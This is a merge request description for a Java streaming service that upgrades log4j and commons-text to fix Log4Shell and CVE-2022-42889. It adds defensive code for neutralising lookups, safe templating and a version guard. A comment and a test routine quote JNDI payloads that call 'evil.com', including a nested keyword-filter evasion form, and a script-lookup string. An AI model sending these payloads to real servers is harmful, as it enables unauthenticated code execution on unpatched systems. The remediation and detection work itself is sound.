
🔒 CRITICAL: Fix Log4Shell and Commons Text RCE vulnerabilities

🚨 Critical Security Fixes

This MR addresses two critical RCE vulnerabilities affecting streaming-service:

Vulnerabilities Fixed

1. Log4Shell (CVE-2021-44228)

  • Severity: CRITICAL (CVSS 10.0)
  • Vulnerability ID: 157
  • Package: log4j-core, log4j-api
  • Upgrade: 2.14.1 → 2.17.1
  • Risk: Remote Code Execution via JNDI injection
  • Actively exploited in the wild: YES ⚠️

Attack Vector: Any logged user input can trigger JNDI lookup:

logger.info("User: " + userInput); // ${jndi:ldap://evil.com/Exploit}
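The upgrade to 2.17.1 is the fix; the following is an added defensive example, not code from this MR or the streaming-service project, showing a defence-in-depth check that flags and de-fangs lookup-style sequences in untrusted input before it reaches the logger, so that an injection attempt is recorded as a security event rather than silently logged. The class and method names are hypothetical.

```java
import java.util.regex.Pattern;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Added example, not part of the MR. Assumes log4j-core/log4j-api 2.17.1 are on the
// classpath; the upgrade is the real fix and this check is defence in depth only.
public final class SafeLogInput {
    private static final Logger LOG = LogManager.getLogger(SafeLogInput.class);

    // Match the opening of any lookup, not only the literal "jndi": nested lookups
    // such as ${${lower:j}ndi:...} are a known way to evade keyword-only filters.
    private static final Pattern LOOKUP_START = Pattern.compile("\\$\\{");

    /** True when the input contains something an unpatched log4j would try to resolve. */
    public static boolean containsLookup(String input) {
        return input != null && LOOKUP_START.matcher(input).find();
    }

    /**
     * Break the lookup syntax while keeping the payload readable for incident review:
     * "${jndi:...}" becomes "$_{jndi:...}", which no longer parses as a lookup.
     */
    public static String neutralize(String input) {
        return input == null ? null : input.replace("${", "$_{");
    }

    public static void logUser(String userInput) {
        if (containsLookup(userInput)) {
            // Record the attempt itself; SOC tooling can alert on this message.
            LOG.warn("Lookup sequence in user input (neutralised): {}", neutralize(userInput));
        }
        // Parameterised logging; the value is never concatenated into the pattern string.
        LOG.info("User: {}", neutralize(userInput));
    }

    public static void main(String[] args) {
        logUser("alice");                                // benign, constructed sample
        logUser("${jndi:ldap://evil.com/Exploit}");      // the payload shape quoted in the MR
        logUser("${${lower:j}ndi:ldap://evil.com/x}");   // nested form, also flagged
    }
}
```

Run it with log4j 2.17.1 on the classpath; the second and third calls each produce a WARN event with the de-fanged payload followed by the normal INFO line, and neither contains a resolvable `${...}` sequence.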

2. Apache Commons Text RCE (CVE-2022-42889)

  • Severity: CRITICAL
  • Vulnerability ID: 137
  • Package: commons-text
  • Upgrade: 1.9 → 1.10.0
  • Risk: OS Command Injection via script interpolation

Attack Vector: Variable interpolation with untrusted data:

// Vulnerable: the default interpolator resolves ${script:javascript:...}, ${dns:...}, ${url:...}
StringSubstitutor.createInterpolator().replace(untrustedInput);
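To make the safe pattern concrete, here is an added example (not code from this MR or the project) that places the vulnerable interpolator form next to a hardened substitutor whose only resolvable variables come from an application-supplied map. Class, method and variable names are hypothetical; the commons-text API calls are the library's own.

```java
import java.util.Map;
import org.apache.commons.text.StringSubstitutor;
import org.apache.commons.text.lookup.StringLookupFactory;

// Added example, not part of the MR.
public final class SafeTemplating {

    // Vulnerable on commons-text < 1.10.0: the default interpolator registers the
    // script:, dns: and url: lookups, so the untrusted template picks the lookup.
    public static String interpolateUnsafely(String untrustedTemplate) {
        return StringSubstitutor.createInterpolator().replace(untrustedTemplate);
    }

    // Hardened: only keys present in 'vars' can be substituted; any other
    // "${prefix:...}" text is an unknown key and is left in place as literal text.
    public static String interpolateSafely(String template, Map<String, String> vars) {
        StringSubstitutor sub = new StringSubstitutor(
                StringLookupFactory.INSTANCE.mapStringLookup(vars));
        // Substituted values are not themselves re-interpolated.
        sub.setDisableSubstitutionInValues(true);
        return sub.replace(template);
    }

    public static void main(String[] args) {
        // Constructed sample: one legitimate variable next to a lookup-style sequence.
        Map<String, String> vars = Map.of("user", "alice");
        String template = "Hello ${user}, ${script:javascript:1+1}";
        System.out.println(interpolateSafely(template, vars));
    }
}
```

With the map-backed lookup the `${user}` reference is filled in and the `${script:...}` sequence survives unresolved as plain text, because no lookup for that prefix is registered. Even on 1.10.0, where script, dns and url are no longer default lookups, restricting templating of untrusted input to an explicit map keeps the remaining default lookups (system properties, environment variables and so on) out of reach.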

Changes

pom.xml:

  • log4j-core: 2.14.1 → 2.17.1
  • log4j-api: 2.14.1 → 2.17.1
  • commons-text: 1.9 → 1.10.0

Testing

  • Dependency scan shows vulnerabilities resolved
  • All unit tests pass
  • Integration tests pass
  • No breaking API changes
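As an added regression guard (not part of this MR or the project's test suite), the following check verifies at runtime that the classes actually loaded come from the versions listed above, so a later transitive dependency cannot quietly pull an older log4j or commons-text back in. It assumes the jars carry an `Implementation-Version` manifest attribute, which the published log4j and commons-text artifacts do; the class and method names are hypothetical.

```java
import org.apache.commons.text.StringSubstitutor;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.core.LoggerContext;

// Added example, not part of the MR. Intended as a unit test or startup self-check.
public final class DependencyVersionGuard {

    /** Numeric, dotted version comparison: negative, zero or positive like compareTo. */
    static int compare(String a, String b) {
        String[] pa = a.split("\\."), pb = b.split("\\.");
        int n = Math.max(pa.length, pb.length);
        for (int i = 0; i < n; i++) {
            int x = i < pa.length ? Integer.parseInt(pa[i].replaceAll("\\D.*$", "")) : 0;
            int y = i < pb.length ? Integer.parseInt(pb[i].replaceAll("\\D.*$", "")) : 0;
            if (x != y) return Integer.compare(x, y);
        }
        return 0;
    }

    /**
     * True when the jar that defines 'marker' reports at least 'minimum'.
     * Assumption: the jar manifest sets Implementation-Version; a missing value
     * is treated as a failure rather than silently passing.
     */
    public static boolean atLeast(Class<?> marker, String minimum) {
        Package p = marker.getPackage();
        String v = p == null ? null : p.getImplementationVersion();
        return v != null && compare(v, minimum) >= 0;
    }

    /** The three upgrades from this MR's pom.xml changes. */
    public static boolean allFixed() {
        return atLeast(LoggerContext.class, "2.17.1")      // log4j-core
            && atLeast(LogManager.class, "2.17.1")         // log4j-api
            && atLeast(StringSubstitutor.class, "1.10.0"); // commons-text
    }

    public static void main(String[] args) {
        if (!allFixed()) {
            throw new IllegalStateException("vulnerable log4j or commons-text version on the classpath");
        }
    }
}
```

Wire `allFixed()` into an existing unit test so the build fails if a dependency bump regresses; the dependency scan mentioned above catches the same thing at scan time, while this check catches it in the artifact that is actually deployed.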

Deployment Priority

Priority: P0 - EMERGENCY
Severity: CRITICAL

Related Issues

Relates to #8 (Investigate vulnerabilities)

Security Review

Both vulnerabilities allow unauthenticated remote code execution. Immediate deployment is required to prevent exploitation.


🤖 Generated with Claude Code

Co-Authored-By: Claude noreply@anthropic.com
